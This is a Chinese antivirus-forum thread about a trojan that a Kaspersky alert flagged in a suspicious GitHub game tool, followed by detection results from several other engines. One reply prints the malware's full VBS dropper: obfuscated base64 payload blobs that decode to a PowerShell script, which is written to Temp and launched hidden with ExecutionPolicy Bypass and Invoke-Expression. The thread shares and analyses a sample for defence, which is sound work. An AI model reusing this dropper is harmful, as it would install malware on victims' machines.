卡巴报毒

显示全部楼层 · 发表于 2025-2-11 10:39:21

事件: 检测到恶意对象
用户: NT AUTHORITY\SYSTEM
用户类型: 系统用户
应用程序名称: SearchProtocolHost.exe
应用程序路径: C:\Windows\System32
组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan.BAT.Alien.gen
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: tmp5e4201e94c7643e4941ad159897ec359.exec.cmd
对象路径: C:\Users\****\Downloads\
对象的 MD5: D9144BD63FB9B48872A3B16DA6C59F8E
原因: 机器学习
数据库发布日期: 今天，2025/2/11 上午9:10:00

显示全部楼层 · 发表于 2025-2-11 10:44:50

EES 解压kill

显示全部楼层 · 发表于 2025-2-11 10:59:08

生成一个VBS调用POWERSHELL干坏事
b = "JFIgPSAic0pISTcwSElsVm5icFJuYnZOVWVzUm5ibHhXYVRCaWJ2bEdkakZrY3ZKbmNGMUNJcDBXWjBOWGVUcGpPZE5YWjBWbllwSkhkMEZVWnNsbVJ1OFVTdTBXWjBOWGVUdEZJeTltWXRBaWJsUkdacGhrTzYwMWNsUlhkaWxtYzBSWFFseFdhRzV5VEo1U2JsUjNjNU4xV29BU1oxeFdZVzFDSXpWR2QxSldheVJIZEJCU1p0Rm1UdEFDWmtBQ2EwRkdVdEFTZTBKWFp3OW1jUTFXWjBsVUwwVjJVZ3NUWjE1V2EwNTJiRGxIYjA1V1pzbDJVZzQyYnBSM1lCSjNieUpYUnRBU0t0VkdkemwzVTZvVFh6VkdkMUpXYXlSSGRCVkdicFprTFBsa0x0VkdkemwzVWJCaWN2SldMZzRXWmtSV2FJcGpPZE5YWjBWbllwSkhkMEZVWnNsbVJ1OFVTdTBXWjBOWGVUdEZLZ1VXZHNGbVZ0QXljbFJYZGlsbWMwUlhRZ1VXYmg1VUxnOEdKZ2dHZGhCVkxna0hkeVZHY3ZKSFV0VkdkSjFDZGxORkk3a0NLbE4zYndOWGFFNXlZM1JDSTdreWJrQUNMMVJDS2x4V2FHUldZdnhtYjM5R1J1TTJka0F5TzA1V1pweDJRaVYyVnVRWFpPNVNibFIzYzVORkkwTldacUoyVHRjWFpPQlNQZ00yZGtBeU9pVUdlbDVpZTNJQ0lvUlhZUVJHYnBoMlF0QUNaa0FDYTBGR1V0QUNhMEZHVXQ0V2F2cEVJOUF5YmtBeU9pVUdlbDVpYzZkekxoOXlaeTltTHdsbWV0Y2pMM2QzZHY4aU96QkhkMGhtSWcwREkxUkNJN3dHYjE1VUwwVjNUZ3dISWxObWN2WlVMZ1FHSmdnR2RoQlZMZ2tuY3ZSM1lsSlhhRUJTWndsSFZ0VkdkSjFDSXRWR2RKMXlkbDVFSTdCU0twSVNaNFZtTDZkRFhrUmlJZ2dHZGhCVkwwTlhaVWhDSTA5bWJ0Z0NJbWxHSTdJQ2NwcGxibFpYWnp4VlkwRkdSdEZtY245bWNReGxPREpDSTlBQ1prQXlPOUJDZHBGMlZ0QWlibFJHWnBoRUlseFdlME4xZHZSbWJwZFZMZ2NtY2hSQ0kwTlhhTVJuYmwxV2RuSlhRdEFpZWtBQ2EwRkdVbHhXYUcxQ0l6TlhaajltY1ExQ2R5RkdkVEJ5T2lrWExnQUhKdzFDSWlBMmJrSUNZdjFDSWlBV1lrSUNZZ2duSWcwREluSlhZa0F5T2lVR2VsNWllM3dGY3BwbGJsWlhaenhWWTBGR1J0Rm1jbjltY1F4bE9ESkNJOUFpZWtBeU96UkNJcDFDSTJCU1BnQUhKZ3NqSTkwemRPUlRRcDFFZUZSVVMwTUdSSkpUVEVsa01GUlZUblZGVk9kV1FFOTBaTlJWVDRGVWFPTlRRRDVVTUJsV1R3RTBVT05UUTUxMGRGUlVTNjFFUkpOVFZFbFVNWlJVU3owRVJKZFhWRWxFTnJSVVMwMEVSSkJ6YUVsRWVWUlVTNWRHUkpCVFFVMWtJZzBESXpSQ0lwOEdKZGRtYnBKSGR6dEZJc0VHSmRkbWJwSkhkenRGS2cwV1l5RkdjZ3NISWxCaWJ2bEdkajVXZG1CeU85Qmlja0FpYnlWSGRsSkhJNzBISTRSU1gwNVdhYjFs"
c = "Z1FISmdnR2RoQlZMdWwyYktCU1BnWUdKZ3NUS29nR2RoQkZjdFZHVjBWMlI2b1RYb1JYWVE1eVRKNVNibFIzYzVOMVdnMERJMFJDSTdrQ0tuNVdheVIzVXZSbExwZ0NacFYzUjNWbVQ2b1RYa2xXZEg1U2JsUjNjNU4xV2cwREluUkNJOUJ5WXZKSGNrQXlhdEFpY2tBU2J0MUNJa0JTUGd3R1prQXllZ2tpY2tnQ0ltbEdJN1FHSmdrbWNWMUNJazlHYTBWV1QwTlhaUzFTWnI5bWR1bEVJOUFpY2tBeU9qOTJieUJISmdzV0xnVUdKZzBXYnRBQ1pnMERJa1JDSTdCU2V5UkhJOUJpYnlWSGRsSkhJN0JTS2xSQ0kwOW1idGdDSW1sR0lwVUdKZGRtYnBKSGR6dEZLZzBXWXlGR2Nnc0hJd0JpYnZsR2RqNVdkbUJ5TzlCU2Znd21jZ3NETXlBeWNrNTJialYyVXRBQ2NsVkdiVDFDZHlGR2RUQnllZ2cyWTBGMllnMEhJaWMyU045R1JNZDBiRWRETjNselNqRkhSaUozZGg5MGN5UjBOdmQzYkxOWGJFOVNOM05uVHhkSFdQMTBhRHhVYzNaMlROSjNRcVp6ZEo5MFl4UkVWMmNYUlBOR2NEcG5OMzkwVGpKM1FZSkRiRFptTXdSa2QxYzNNTDFVY0VOamMzSkNJd0J5ZWdrbmMwQnllZzhHSXU5V2EwTm1iMVpHSTcwSEk5QnliZ3NISW9OR2RoTkdJOUJpSTlBemIzTjJUNGdHUnFGM2REOUVPcU5FVlloR1I2QjNkd3NFT3NOa2MxYzNZR1p6ZGg5MGN3TkVUeGRIUlBObWJFcFhOM1YwVGpCM1E2WnpkUDkwWXlORVd5dzJRbUpEY0VaWE4zTnpTTkZIUnpJM2RpQUNjZ3NISTVKSGRnc0hJNEJpYnZsR2RqNVdkbUJ5TzlCU2ZnZ0hJN0JDYWpSWFlqQlNmZ0lTTXdWemR6c1VUdFJrZTFjblJQaFRXNHQwY3VORVRJMTJReUIzZGpSbk4zMTBUalIzUVFGM2RGOTBjdFJrYXhkWFJQTkdjRHBuTjM5MFRqSjNRWUpEYkRabU13UmtkMWMzTUwxVWNFTmpjM0pDSXdCeWVna25jMEJ5ZWd3R0l1OVdhME5tYjFaR0k3MEhJOUJDYmdzSElvTkdkaE5HSTlCaUk5MHpaMU5FVzFjSFNQaHpiRHgwTjNOMVQ0NDJRTVp6ZFM5VVR5TjBNeGRuWVBObmFESm1OM0YxVHpSM1FRRjNkRDlFT3ZSME0xY25UTE5uYkR4a04zcDFUNEkzUVlKRGJEWm1Nd1JrZDFjM01MMVVjRU5qYzNKQ0l3QnllZ2tuYzBCeWVnd21jZzQyYnBSM1l1Vm5aIjsgJHR4dCA9ICRSLlRvQ2hhckFycmF5KCk7IFthcnJheV06OlJldmVyc2UoJHR4dCk7ICRibmIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKC1qb2luICR0eHQpKTsgJGV4cCA9ICJJbnZva2UtRXhwcmVzc2lvbiI7IE5ldy1BbGlhcyAtTmFtZSBwV04gLVZhbHVlICRleHAgLUZvcmNlOyBwV04gJGJuYg=="
d = "Y2hoMlliQlNQckFpY2tBeWVna3lZa0FpYnBCQ2VrZ0NJb05XWWxKM2JtQnlPaUlDSTlBaWNrQXlPbkF5SmdRWGFzQjNjdEF5Y2tBU1BnTUdKZ3NUS2lSQ0tuNVdheVIzVTBWMlJ1Z2pSVVZsTzYwMVp1bEdadk5tYkY1Q2Q0VkdWdTBXWjBOWGVUdEZJOUF5Y2tBeU9wa0dKb2NtYnBKSGRUUmpObE5YWUMxMmJ5WmtPNjBGZHlWbWR1OTJRdTBXWjBOWGVUdEZJOUFpWWtBU0twUlNYbjVXYXlSM2NiaENJdEZtY2hCSEk3QmlkZzQyYnBSM1l1Vm5aZ3NqSTl4Q0pnZDFPaEoyZStCa2I0MDBNNHdTT2lCWGNpQVNQZ00yYnlCSEpnc1RmZzBISTM5bWNvUkhJN0JDYWpSWFlqQlNmZ1FHSmc0V2F2cFdMZzRtYzFSWFp5QnlPOUJTS3dSQ0l0QXlZa2dTWHlGR2FqdEZJOUFTWHBSeVdrUkNJNzBGYTBkbWJseGtMclJDSWxBU2FrczFha0FTUGdBSEpnc1RYcFJ5V3pSQ0k5QXlZa0F5ZWdreUtya0dKZ3NEYTBkbWJseGtMelJDSTB4V0xna0dKZ3NETWcwRElwUkNLZ0kzYm1CeU9vUjNadVZHVHVNSEpnMDFXeUZHYWpCQ2RqVm1haTlVTDNWbVRnMERJa1JDSTdraVlrZ3ladWxtYzBORmRsZGtMNFlFVlZwak9kZG1icFIyYmo1V1J1UUhlbFJsTHRWR2R6bDNVYkJTUGdNSEpnc1RLdDFHSm9jbWJwSkhkVFJqTmxOWFlDMTJieVprTzYwRmR5Vm1kdTkyUXUwV1owTlhlVHRGSTlBaVlrQXllZ2tuYzBCU0tyUlNYbjVXYXlSM2NiQkNMdDFHSmRkbWJwSkhkenRGS2cwV1l5RkdjZ3NISWtCaWJ2bEdkajVXZG1CeU9pUW5lZkZUZXQxak5vMUNkck5FZFZKQ0k5QXlZdjltY3dSQ0k3MEhJOUJ5ZHZKSGEwQnllZ2cyWTBGMllnMEhJOUJTZmdZR0pnMFdaMGxVTGxaM2J0Vm1VZ3NISXBZR0pnZ0dkaEJWTDBOWFpVaENJbWxHSTlCaWJsUkdacGhFSWx4V2UwTjFkdlJtYnBkVkxnWUVlbFJDSW9SWFlRVkdicFpVTGdNM2NsTjJieUJWTDBKWFkwTkZJN0JTS0doWFprQUNhMEZHVXRRM2NsUkZLZ1lXYWdzaklsaFhadUlYWjB4V2FHaDJZeUZXWlRKQ0k0VkdKZ2dHZGhCVkx1bDJiS0JTUGdZRWVsUkNJN2dYWmtBeWJ0QWlaa0FTWXRBU1pnc1RLaVJDSXNZR0pvTVhaMGxuUXN4V1FsUlhheWRsTzYwVlpzbG1SdThVU3UwV1owTlhlVHRGSTdCU0t3QUNkbjFDSW9SM1p1VkdUdUlHSm9BaVpwQnlPcHdHWmtnU1kwRkdSa0YyYnM1MmR2UmtMalJDSTlBaVlrQXlPMDVXWnB4MlFpVjJWdVFYWk81U2JsUjNjNU5GSTBOV1pxSjJUdGNYWk9CU1BnTUdKZ3NUS3BneVp1bG1jME4xYlU1U0tvUVdhMWQwZGw1a082MEZacFYzUnUwV1owTlhlVHRGS2dRSEpnZ0dkaEJWTHVsMmJLQlNQZ2dYWmtBeU9wSWllMzRpSWdzQ0luUkNL"
e = b & d & c
Set f = CreateObject("MSXml2.DOMDocument.6.0").createElement("base64")
f.DataType = "bin.base64"
f.Text = e
g = f.NodeTypedValue
h = "C:\Users\SHAOJI~1\AppData\Local\Temp\a\i.ps1"
Set j = CreateObject("Scripting.FileSystemObject")
Set k = j.CreateTextFile(h, True)
k.Write l(g)
k.Close
Set m = CreateObject("WScript.Shell")
m.Run "powershell.exe -ExecutionPolicy Bypass -File " & h, 0, False
Function l(n)
Dim o, p
Set o = CreateObject("ADODB.Recordset")
p = LenB(n)
If p > 0 Then
o.Fields.Append "q", 201, p
o.Open
o.AddNew
o("q").AppendChunk n
o.Update
l = o("q").GetChunk(p)
Else
l = ""
End If
End Function

显示全部楼层 · 发表于 2025-2-11 12:14:49

WD 扫描

显示全部楼层 · 发表于 2025-2-11 12:29:57

迈克菲 kill

显示全部楼层 · 发表于 2025-2-11 13:18:26

FortiClient 云沙盒检出

显示全部楼层 · 发表于 2025-2-11 13:38:22

https://app.any.run/tasks/1586c96c-aaf3-492e-849e-0b9309f8f381一直在干坏事

显示全部楼层 · 发表于 2025-2-11 14:02:15

显示全部楼层 · 发表于 2025-2-11 14:47:12

AhnLab云分析倾向安全

显示全部楼层 · 发表于 2025-2-11 15:12:47

本帖最后由 lsop1349987 于 2025-2-11 15:14 编辑

wowocock 发表于 2025-2-11 10:59
生成一个VBS调用POWERSHELL干坏事
b = "JFIgPSAic0pISTcwSElsVm5icFJuYnZOVWVzUm5ibHhXYVRCaWJ2bEdkakZrY3 ...

翻GitHub发现一个可疑游戏工具，在虚拟机里用VS编译运行时生成的，没想到真有问题

[病毒样本] 卡巴报毒

本帖子中包含更多资源

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块